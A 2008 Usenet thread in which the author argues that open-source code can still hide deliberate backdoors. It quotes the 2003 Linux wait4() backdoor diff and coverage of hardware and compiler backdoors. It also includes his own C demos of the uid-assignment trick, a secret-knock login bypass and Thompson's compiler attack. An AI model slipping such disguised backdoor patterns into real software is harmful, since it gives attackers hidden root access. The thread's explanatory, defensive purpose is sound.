
The Security Advantages and Limitations of Open Source Software -- Guy Macon


Guy Macon
May 29, 2008, 3:09:55 PM

Post #1 of 5 - Guy Macon

The following series of posts may give the impression that I do
not believe that Open Source software is secure, but that would
be a false impression. I am a big supporter of Open Source,
and agree that in most cases it is far more secure than any
proprietary software. I am posting this series in response to
recent claims by anonymous posters that Open Source security
isn't just very good, but perfect or nearly perfect. Here are
some quotes showing such claims:

"With software the source code tells you everything about the
software, from the very basic building blocks up assuming it's
built with open source tools. You can analyze that source, and use
it to reproduce a finished product directly. Then you can
mathematically compare your product to an off the shelf version and
detect the most minute differences with near perfect precision."

"My compiler is open source also. Which was already stated quite clearly
several times now. It's validated using the same methods every other
piece of software and every other tool on this machine is validated,
and will not willingly insert any 'back doors' in programs compiled with
it. The same goes for all the thousands of supporting libraries and
such that I use. It has all been endlessly peer reviewed, obtained from
reputable sources, and validated with cryptographic signatures using
keys obtained through separate channels. It's for all intents and
purposes impossible for a willfully compromised piece of software to
exist on this machine."

In the following series of posts, I will attempt to show that Open
Source is no magic bullet, and that we still have to trust the
developers to not purposely insert backdoors into Open Source code.
The reader should keep in mind that closed and proprietary software
is far worse in this regard.







--
Guy Macon <http://www.guymacon.com/>

Guy Macon
May 29, 2008, 3:24:32 PM

Post #2 of 5 - Guy Macon

Consider the following series of posts to the Linux Kernel
mailing list. Then imagine what the result would have been
if, through bribes or threats, the backdoor discussed had
been inserted by a trusted member of the development team.

If you think this is not possible, you are expecting the members
of the development team to care so much about security that they
cannot be bribed, that they will ignore a criminal who threatens
to kill them or their family, and that they will defy a government
that threatens to grab them off the street and lock them up in a
metal box in some foreign country without telling anybody what
happened to them.

http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0621.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0627.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0629.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0633.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0666.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0630.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0635.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0647.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0649.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0653.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0699.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0717.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0728.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0651.html
http://www.ussg.iu.edu/hypermail/linux/kernel/0311.0/0756.html

(Note that the last 2 posts are by Linus Torvalds.)


Here are some key quotes from the above messages. The interested
reader should read the originals to get the entire context.

------------------------------------


"Somebody has modified the CVS tree on kernel.bkbits.net directly. Dave looked
at the machine and it looked like someone may have been trying to break in and
do it.

We've fixed the file in question, the conversion is done back here at BitMover
and after we transfer the files we check them and make sure they are OK and
this file got flagged.

The CVS tree is fine, you might want to remove and update exit.c to make sure
you have the current version in your tree however."

...

"The file here is fine which leads me to believe that someone modified
the file either on kernel.bkbits.net or managed to get in through the
pserver."

...

"It's not a big deal, we catch stuff like this, but it's annoying to the
CVS users."

------------------------------------

"...

> Out of curiosity, what were the changed lines?

--- GOOD	2003-11-05 13:46:44.000000000 -0800
+++ BAD	2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
 			schedule();
 			goto repeat;
 		}
+		if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+			retval = -EINVAL;
 		retval = -ECHILD;
 end_wait4:
 		current->state = TASK_RUNNING;

..."

------------------------------------

">> That looks odd
>
> Not if you hope to get root.

You got it. Short-circuiting will make the second half of the
conditional execute only when the first half is true. So if options
equals __WCLONE|__WALL exactly, then the user is changed to root."

------------------------------------

"it looks like an attempt to backdoor the kernel, does it not?"

------------------------------------

"It sure does. Note "current->uid = 0", not "current->uid == 0".
Good eyes, I missed that. This function is sys_wait4() so by passing in
__WCLONE|__WALL you are root. How nice."

------------------------------------

"Also note the extra parentheses to avoid a gcc warning."

------------------------------------

"First of all, thanks Larry for detecting this. Your paranoia that made
you add extra checks on the export of data (also evident in the BK
checksums everywhere) probably saved Linux as a whole a lot of grief.

Had something like this been submarined into the kernel without any
review it might have taken a good while to find,"

------------------------------------

"It's worth mentioning that it would be close to impossible to add the
same to change to BK unnoticed. It's possible but the accountability
would be a lot better and the bad user could be tarred and feathered."

...

"I've verified 30 seconds ago that the change is not in in Linus'
BK tree. We run these comparisons every night (and I'm going to
increase that after we reinstall the machine). So I noticed this
this morning and had the tree fixed this afternoon; I suppose
people could complain that it should have been sooner but I was
running tests to make sure it was not some problem in the BK2CVS
exporter code.

Even with the delay, the problem was identified and corrected in less
than 24 hours. That doesn't leave a lot of time to have the problem
get into the real release tree."

------------------------------------

"Somebody getting access to and inserting exploits directly into
the Linux source is not something we should take lightly."

------------------------------------

"It is well known that anybody who has the capabilities of
inserting a module into the most secure kernel in the
universe [Linux], could have designed the module to give
the current caller root privs when some module function
is executed.

$ whoami
cracker
$ od /dev/TROJAN
$ whoami
root
$

The kernel sources can be inspected using automation, looking
for accesses to 'current'. The expected patterns can be ignored.
Accesses to current->XXX, current->YYY, current->ZZZ, etc., could be
reviewed. However, this doesn't stop the clever programmer who
creates a pointer that, using a difficult-to-follow path, has
access to these structure members.

So, basically, any open-source kernel is vulnerable. Also any
closed-source kernel is also vulnerable. We already know that
M$ had hundreds of bugs, perhaps more, that allowed a hacker
complete unrestricted access to a machine on the network. We
also know that there are deliberate back-doors inserted to
allow governments to inspect the contents of these computers
(search on Magic Lantern and Carnivore)."

------------------------------------

From: Linus Torvalds

"A few things do make the current system _fairly_ secure. One of them is
that if somebody were to actually access the BK trees directly, that would
be noticed immediately: when I push to the places I export from, the push
itself would fail due to having an unexpected changeset in the target that
I don't have on my local tree. So I'd notice that kind of stuff
immediately.

And that's likely to be true of all other BK users too: the public trees
are just replicas of the trees people actually _work_ on, so if the public
tree has something unexpected, trying to update them just won't work. You
just can't push to a tree that isn't a subset of what you already have.

So any BK corruption would have to come from the private trees, not the
public ones. Which tend to be better secured, exactly because they are
private (ie they don't have things like cvspserver etc public servers). I
suspect most of us have firewalls that just don't accept any incoming
connections - I know I do.

I think it's telling that it was the CVS tree and not the BK tree that
somebody tried to corrupt.

Linus"



"> And, was there any route via which this malicious patch could've worked
> itself into a kernel release?

No. There are two ways to get into a kernel release: patches to me by
email (which depending on the person get more or less detailed scrutiny,
but core files would definitely get a read-through and need an
explanation), and through BK merges.

And the people who merge with BK wouldn't have used the CVS tree.

Linus"



------------------------------------

(End of quoted material; Guy Macon writing again)

The bottom line is that it is possible for someone whom everyone
trusts to insert a backdoor into Open Source code, and that no
automated method will catch it. The only way such a backdoor gets
detected is by someone else examining the code and noticing it.
As the example above shows, a backdoor can be very subtle and
hard to spot.
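
To see just how easy this kind of thing is to overlook, here is a
small stand-alone C program of my own. It is an illustration only,
not kernel code: the uid variable and the flag values merely
simulate their kernel counterparts. It reproduces the heart of the
trick, including the extra parentheses that keep gcc quiet:

/* backdoor_demo.c - stand-alone illustration of the wait4() trick.
 * Not kernel code: uid, __WCLONE and __WALL are simulated here.
 */
#include <stdio.h>

#define __WCLONE 0x80000000u
#define __WALL   0x40000000u

static unsigned int uid = 1000;     /* stands in for current->uid */

static int fake_wait4(unsigned int options)
{
    /* Reads like "reject this invalid flag combination if the
     * caller is root".  But "uid = 0" ASSIGNS zero and evaluates
     * to 0 (false), so -EINVAL is never returned -- and uid is
     * now 0, i.e. root.  The extra parentheses around the
     * assignment suppress gcc's "assignment used as truth value"
     * warning. */
    if ((options == (__WCLONE|__WALL)) && (uid = 0))
        return -22;                 /* -EINVAL */
    return 0;
}

int main(void)
{
    printf("uid before: %u\n", uid);    /* 1000 */
    fake_wait4(__WCLONE|__WALL);        /* the secret knock */
    printf("uid after:  %u\n", uid);    /* 0 == root */
    return 0;
}

Compiled with "gcc -Wall", this builds without a single warning,
prints a uid of 1000 before the call, and a uid of 0 (root) after.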

Guy Macon
May 29, 2008, 3:31:31 PM

Post #3 of 5 - Guy Macon

------------------------------------

"Thwarted Linux backdoor hints at smarter hacks

"Software developers on Wednesday detected and thwarted a hacker's
scheme to submerge a slick backdoor in the next version of the Linux
kernel, but security experts say the abortive caper proves that
extremely subtle source code tampering is more than just the stuff of
paranoid speculation.

"The backdoor was a two-line addition to a development copy of the
Linux kernel's source code, carefully crafted to look like a harmless
error-checking feature added to the wait4() system call -- a function
that's available to any program running on the computer, and which,
roughly, tells the operating system to pause execution of that program
until another program has finished its work.

"Under casual inspection, the code appears to check if a program
calling wait4() is using a particular invalid combination of two
flags, and if the user invoking it is the computer's all-powerful root
account. If both conditions are true, it aborts the call.

"But up close, the code doesn't actually check if the user is root at
all. If it sees the flags, it grants the process root privileges,
turning wait4() into an instant doorway to complete control of any
machine, if the hacker knows the right combinations of flags.

"That difference between what the code looks like and what it actually
is -- that is, between assignment and comparison -- is a matter of a
single equal sign in the C programming language, making it easy to
overlook. If the addition had been detected in a normal code review,
the backdoor could even have been mistaken for a programming error --
no different from the buffer overflows that wind up in Microsoft
products on a routine basis. 'It's indistinguishable from an
accidental bug,' says security consultant Ryan Russell. 'So unless you
have a reason to be suspicious, and go back and find out if it was
legitimately checked in, that's going to be a long trail to follow.'

"Investigation Underway

"In all, the unknown hacker used exactly the sort of misdirection and
semantic trickery that security professionals talk about over beer
after a conference, while opining on how clumsy the few discovered
source code backdoors have been, and how a real cyber warrior would
write one.

"'That's the kind of pub talk that you end up having,' says BindView
security researcher Mark 'Simple Nomad' Loveless. 'If you were the
NSA, how would you backdoor someone's software? You'd put in the
changes subtly. Very subtly.'

"'Whoever did this knew what they were doing,' says Larry McVoy,
founder of San Francisco-based BitMover, Inc., which hosts the Linux
kernel development site that was compromised. 'They had to find some
flags that could be passed to the system without causing an error, and
yet are not normally passed together... There isn't any way that
somebody could casually come in, not know about UNIX, not know the
Linux kernel code, and make this change. Not a chance.'

"However sophisticated, the hack fell apart Wednesday, when a routine
file integrity check told McVoy that someone had manually changed a
copy of a kernel source code file that's normally only modified by an
automated process, specifically one that pulls the code from
BitMover's BitKeeper software collaboration tool and repackages it for
the open source CVS system still favored by some developers.

"Even then, McVoy didn't initially recognize the change as a backdoor,
and he announced it to the Linux kernel developers list as a procedural
annoyance. Other programmers soon figured out the trick, and by
Thursday an investigation into how the development site was
compromised was underway, headed by Linux chief Linus Torvalds,
according to McVoy.

"If BitMover didn't run automated integrity checks, the backdoor could
have made it into the official release of version 2.6 of the kernel,
and eventually into every up-to-date Linux machine on the Internet.
But to get there a kernel developer using CVS would have to have used
the modified file as the basis for further development, then submitted
it to the main BitKeeper repository through Torvalds.

"'If it had gotten out, it could have been really bad, because any
Linux kernel that had this in it, anybody who had access to that
machine could become root,' says McVoy. But even then, he's convinced
it wouldn't have lasted long. 'If someone started getting root with
it, some smart kid would figure out what was going on.'

"But Loveless says the hack is a glimpse of a more sophisticated
computer underground than is normally talked about, and fuel for
speculation that backdoors in software products are far more common
than imagined. 'We've had bad examples of [backdoors], and we've had
rumors of extremely good examples,' says Loveless. 'This is a concrete
example of a good one.'"

Source: http://www.securityfocus.com/news/7388

------------------------------------
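
(Guy Macon again.) Note that it was a routine, automated integrity
check, not a lucky code review, that caught the change. Here is a
minimal sketch in C of that general idea; the toy 32-bit FNV-1a
hash and the command-line interface are my own inventions, and a
real system such as BitKeeper uses far stronger per-file checksums:

/* integrity_check.c - minimal sketch of an automated file
 * integrity check: hash a file and compare the result against a
 * known-good value recorded earlier.
 */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

static uint32_t fnv1a_file(const char *path)
{
    FILE *f = fopen(path, "rb");
    uint32_t h = 2166136261u;       /* FNV-1a offset basis */
    int c;

    if (f == NULL)
        return 0;
    while ((c = fgetc(f)) != EOF)
        h = (h ^ (uint32_t)c) * 16777619u;  /* FNV-1a prime */
    fclose(f);
    return h;
}

int main(int argc, char **argv)
{
    uint32_t expected, actual;

    if (argc != 3) {
        fprintf(stderr, "usage: %s <file> <expected-hex-hash>\n",
                argv[0]);
        return 2;
    }
    expected = (uint32_t)strtoul(argv[2], NULL, 16);
    actual = fnv1a_file(argv[1]);
    if (actual != expected) {
        printf("MISMATCH: %s hashes to %08x, expected %08x\n",
               argv[1], (unsigned)actual, (unsigned)expected);
        return 1;                   /* flag the file for review */
    }
    printf("OK: %s\n", argv[1]);
    return 0;
}

Run nightly over every file in an exported tree, as BitMover did,
a single changed byte turns up as a mismatch within a day.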

Guy Macon
May 29, 2008, 3:42:42 PM

Post #4 of 5 - Guy Macon

------------------------------------

"For years, hackers have focused on finding bugs in computer software
that give them unauthorized access to computer systems, but now
there's another way to break in: Hack the microprocessor.

"Researchers at the University of Illinois at Urbana-Champaign
demonstrated how they altered a computer chip to grant attackers
backdoor access to a computer. It would take a lot of work to make
this attack succeed in the real world, but it would be virtually
undetectable.

"To launch its attack, the team used a special programmable processor
running the Linux operating system. The chip was programmed to inject
malicious firmware into the chip's memory, which then allows an
attacker to log into the machine as if he were a legitimate user. To
reprogram the chip, researchers needed to alter only a tiny fraction
of the processor circuits. They changed 1,341 logic gates on a chip
that has more than 1 million of these gates in total, said Samuel
King, an assistant professor in the university's computer science
department.

"'This is like the ultimate back door,' said King. 'There were no
software bugs exploited.'

"King demonstrated the attack on Tuesday at the Usenix Workshop on
Large-Scale Exploits and Emergent Threats, a conference for security
researchers held in San Francisco.

"His team was able to add the back door by reprogramming a small
number of the circuits on a LEON processor running the Linux operating
system. These programmable chips are based on the same Sparc design
that is used in Sun Microsystems' midrange and high-end servers. They
are not widely used, but have been deployed in systems used by the
International Space Station.

"In order to hack into the system, King first sent it a specially
crafted network packet that instructed the processor to launch the
malicious firmware. Then, using a special login password, King was
able to gain access to the Linux system. 'From the software's
perspective, the packet gets dropped ... and yet I have full and
complete access to this underlying system that I just compromised,'
King said."

Source: http://www.cs.uiuc.edu/news/articles.php?id=2008May14-341

------------------------------------

"A team led by Samuel King, assistant professor at the University of
Illinois, Urbana-Champaign, has demonstrated how to gain control of a
computer by adding malicious circuits to its processor.

"Such circuits are effectively invisible to antivirus and other
security software because they interfere with the computer at a deeper
level than a software-based virus or even a rootkit.

"King's team explained to New Scientist that they used a processor
called a field programmable gate array (FPGA), in which logic circuits
can be rearranged to create a replica of an existing open source
processor called Leon3.

"The original processor contains around 1.7 million circuits, but the
boffins added about 1,000 malicious circuits not present in Leon3.

"The new circuits allowed them to bypass security controls on Leon3 in
a similar way to which a virus hands control of a computer to a
hacker, but without requiring a flaw in a software application.

"When the scientists connected the FPGA to another computer, they were
able to steal passwords and install malicious software that allowed
the operating system to be controlled remotely.

"'Once you have this mechanism in place, you can do whatever you
want,' King told New Scientist."

Source: http://www.itnews.com.au/News/NewsStory.aspx?story=75106

------------------------------------

"Consider a recent paper by U. Illinois's Sam King et al. where they
built a 'malicious processor'. The idea is pretty clever. You send
along a 'secret knock' (e.g., a network packet with a particular
header) which triggers a sensor that enables 'shadow code' to start
running alongside the real operating system. The Illinois team built
shadow code that compromised the Linux login program, adding a
backdoor password. After the backdoor was tripped, it would disable
the shadow code, thus going back to 'normal' operation.

"The military is awfully worried about this sort of threat, as well
they should be. For that matter, so are voting machine critics. It's
awfully easy for 'stealth' malicious behavior to exist in legitimate
systems, regardless of how carefully you might analyze or test it."

Source: http://www.freedom-to-tinker.com/?p=1289
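
------------------------------------

(Guy Macon again.) The "secret knock" idea is easier to grasp with
a software analogue. The sketch below is entirely my own invention
-- the magic header value, the shadow flag, and the login check are
all made up -- but it shows the shape of the trigger that King's
team built in hardware, where no amount of software inspection
would reveal it:

/* knock_sketch.c - software analogue of the hardware "secret
 * knock".  Everything here is invented for illustration.  In the
 * real attack the "sensor" is a handful of extra logic gates
 * inside the processor, invisible to any software audit.
 */
#include <stdio.h>
#include <stdint.h>

#define MAGIC_HEADER 0xDEADC0DEu    /* the secret knock (invented) */

static int shadow_mode = 0;         /* set once the knock is seen */

static void inspect_packet(uint32_t header)
{
    /* From the software's perspective a knock packet is simply
     * dropped: no log entry, no error, nothing to see. */
    if (header == MAGIC_HEADER)
        shadow_mode = 1;
}

static int login_ok(const char *password)
{
    (void)password;
    if (shadow_mode)
        return 1;                   /* backdoor: anything works */
    /* ... normal password verification would go here ... */
    return 0;
}

int main(void)
{
    printf("before knock: %d\n", login_ok("guess"));   /* 0 */
    inspect_packet(MAGIC_HEADER);                      /* knock */
    printf("after knock:  %d\n", login_ok("guess"));   /* 1 */
    return 0;
}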

Guy Macon
May 29, 2008, 3:54:44 PM

Post #5 of 5 - Guy Macon

------------------------------------

"There is no strong guarantee that source code and binaries of an
application have any real relationship."

"All the benefits of source code peer review are irrelevant if you
can not be certain that a given binary application is the result
of the reviewed source code.

"Ken Thompson made this very clear during his 1983 Turing Award
lecture to the ACM, in which he revealed a shocking, and subtle,
software subversion technique that's still illustrative seventeen
years later.

"Thompson modified the UNIX C compiler to recognize when the login
program was being compiled, and to insert a back door in the
resulting binary code such that it would allow him to login as
any user using a 'magic' password.

"Anyone reviewing the compiler source code could have found the
back door, except that Thompson then modified the compiler so
that whenever it compiled itself, it would insert both the code
that inserts the login back door, as well as code that modifies
the compiler. With this new binary he removed the modifications
he had made and recompiled again.

"He now had a trojaned compiler and clean source code. Anyone
using his compiler to compile either the login program, or
the compiler, would propagate his back doors.

"The reason his attack worked is because the compiler has a
bootstrapping problem. You need a compiler to compile the
compiler. You must obtain a binary copy of the compiler before
you can use it to translate the compiler source code into a
binary. There was no guarantee that the binary compiler you
were using was really related to the source code of the same."

Source: http://www.securityfocus.com/news/19

------------------------------------

"Perhaps the definitive account of the problems inherent in computer
security and trust is related in Ken Thompson's article, _Reflections
on Trusting Trust_ [Communications of the ACM, Volume 27, Number 8,
August 1984]. Thompson describes a back door planted in an early
research version of UNIX.

"The back door was a modification to the /bin/login program that would
allow him to gain superuser access to the system at any time, even if
his account had been deleted, by providing a predetermined username
and password. While such a modification is easy to make, it's also an
easy one to detect by looking at the computer's source code. So
Thompson modified the computer's C compiler to detect if it was
compiling the login.c program. If so, then the additional code for the
back door would automatically be inserted into the object-code stream,
even though the code was not present in the original C source file.

"Thompson could now have the login.c program inspected by his
coworkers, compile the program, install the /bin/login executable, and
yet be assured that the back door was firmly in place.

"But what if somebody inspected the source code for the C compiler
itself? Thompson thought of that case as well. He further modified the
C compiler so that it would detect whether it was compiling the source
code for itself. If so, the compiler would automatically insert the
special program recognition code. After one more round of compilation,
Thompson was able to put all the original source code back in place.

"Thompson's experiment was like a magic trick. There was no back door
in the login.c source file and no back door in the source code for the
C compiler, and yet there was a back door in both the final compiler
and in the login program. Abracadabra!

"What hidden actions do your compiler and login programs perform?"

Source: _Practical UNIX and Internet Security_,
http://www.hackemate.com.ar/textos/O'reilly%20-%20Complete%20Bookshelf/networking_bookshelf/puis/ch27_01.htm

------------------------------------

"Ken Thompson's Reflections on Trusting Trust
[http://portal.acm.org/citation.cfm?id=358198.358210] was the first
major paper to describe black box backdoor issues, and points out
that trust is relative. It described a very clever backdoor mechanism
based upon the fact that people only review source (human-written)
code, and not compiled machine code. A program called a compiler is
used to create the second from the first, and the compiler is usually
trusted to do an honest job.

"Thompson's paper described a modified version of the Unix C compiler
that would:

* Put an invisible backdoor in the Unix login command when compiled,
and as a twist

* Also add this feature undetectably to future compiler versions
upon their compilation as well.

"Because the compiler itself was a compiled program, users would be
extremely unlikely to notice the machine code instructions that
performed these tasks. (Because of the second task, the compiler's
source code would appear 'clean'.) What's worse, in Thompson's proof
of concept implementation, the subverted compiler also subverted the
analysis program (the disassembler), so that anyone who examined the
binaries in the usual way would not actually see the real code that
was running, but something else instead.

...

"In theory, once a system has been compromised with a backdoor or
Trojan horse, such as the Trusting Trust compiler, there is no way for
the 'rightful' user to regain control of the system. However, several
practical weaknesses in the Trusting Trust scheme have been suggested.
(For example, a sufficiently motivated user could painstakingly review
the machine code of the untrusted compiler before using it. As
mentioned above, there are ways to counter this attack, such as
subverting the disassembler; but there are ways to counter that
defense, too, such as writing your own disassembler from scratch, so
the infected compiler won't recognize it.)"

Source: http://en.wikipedia.org/wiki/Backdoor_(computing)

------------------------------------

Also see:
http://portal.acm.org/citation.cfm?id=358198.358210
http://portal.acm.org/citation.cfm?id=777313.777347
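
------------------------------------

(Guy Macon again.) The structure of Thompson's attack fits in a
few lines of C. The toy "compiler" below is really just a
pass-through that copies its input to its output, and the match()
helper and the injected comments are my own stand-ins for
Thompson's real pattern recognition and quine-style code
generation, but the two tests are exactly the two he describes:

/* trusting_trust_sketch.c - deliberately simplified outline of
 * Thompson's compiler attack.  The pattern matching and the
 * injected text are stand-ins; his real version generated working
 * back-door code via a self-reproducing program.
 */
#include <stdio.h>
#include <string.h>

/* Crude stand-in for the compiler recognizing what it compiles. */
static int match(const char *source, const char *pattern)
{
    return strstr(source, pattern) != NULL;
}

static void compile(const char *source, FILE *out)
{
    if (match(source, "int login("))
        /* Test 1: compiling login - emit a back door that also
         * accepts a hard-wired "magic" password. */
        fputs("/* injected: accept magic password */\n", out);

    if (match(source, "static void compile("))
        /* Test 2: compiling the compiler itself - re-emit both
         * of these tests, so a clean compiler source still
         * yields an infected compiler binary. */
        fputs("/* injected: re-insert both tests */\n", out);

    fputs(source, out);             /* compile code as written */
}

int main(void)
{
    compile("int login(const char *user, const char *pw);\n",
            stdout);
    return 0;
}

Once test 2 has run once, the compiler's source can be restored to
the clean version, and every compiler binary built from it keeps
both back doors -- the "magic trick" described above.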

Ari
May 30, 2008, 7:11:09 PM

On Thu, 29 May 2008 13:09:55 CST, Guy Macon wrote:

> In the following series of posts, I will attempt to show that Open
> Source is no magic bullet, and that we still have to trust the
> developers to not purposely insert backdoors into Open Source code.

Good luck, Guy, you're fighting "O Brave Sir Anonymouse"


--
An Explanation Of The Need To Be "Anonymous"
http://www.penny-arcade.com/comic/2004/03/19

Paul E. Bennett
May 31, 2008, 10:11:42 AM

Guy Macon wrote:

>
> Post #1 of 5 - Guy Macon
>
> The following series of posts may give the impression that I do
> not believe that Open Source software is secure, but that would
> be a false impression. I am a big supporter of Open Source,
> and agree that in most cases it is far more secure than any
> proprietary software. I am posting this series in response to
> recent claims by anonymous posters that Open Source security
> isn't just very good, but perfect or nearly perfect. Here are
> some quotes showing such claims:

Like almost everything else in this life, if you want it perfect
then you have to buckle down and do it yourself. If you use stuff
that is the work of others, then either you have to feel you can
trust them or you have to prove that what they produce really is
trustworthy. Some things really deserve much more attention to
detail than they receive, and the preservation of safety and of
security are two of them.

--
********************************************************************
Paul E. Bennett...............<email://Paul_E....@topmail.co.uk>
Forth based HIDECS Consultancy
Mob: +44 (0)7811-639972
Tel: +44 (0)1235-811095
Going Forth Safely ..... EBA. www.electric-boat-association.org.uk..
********************************************************************
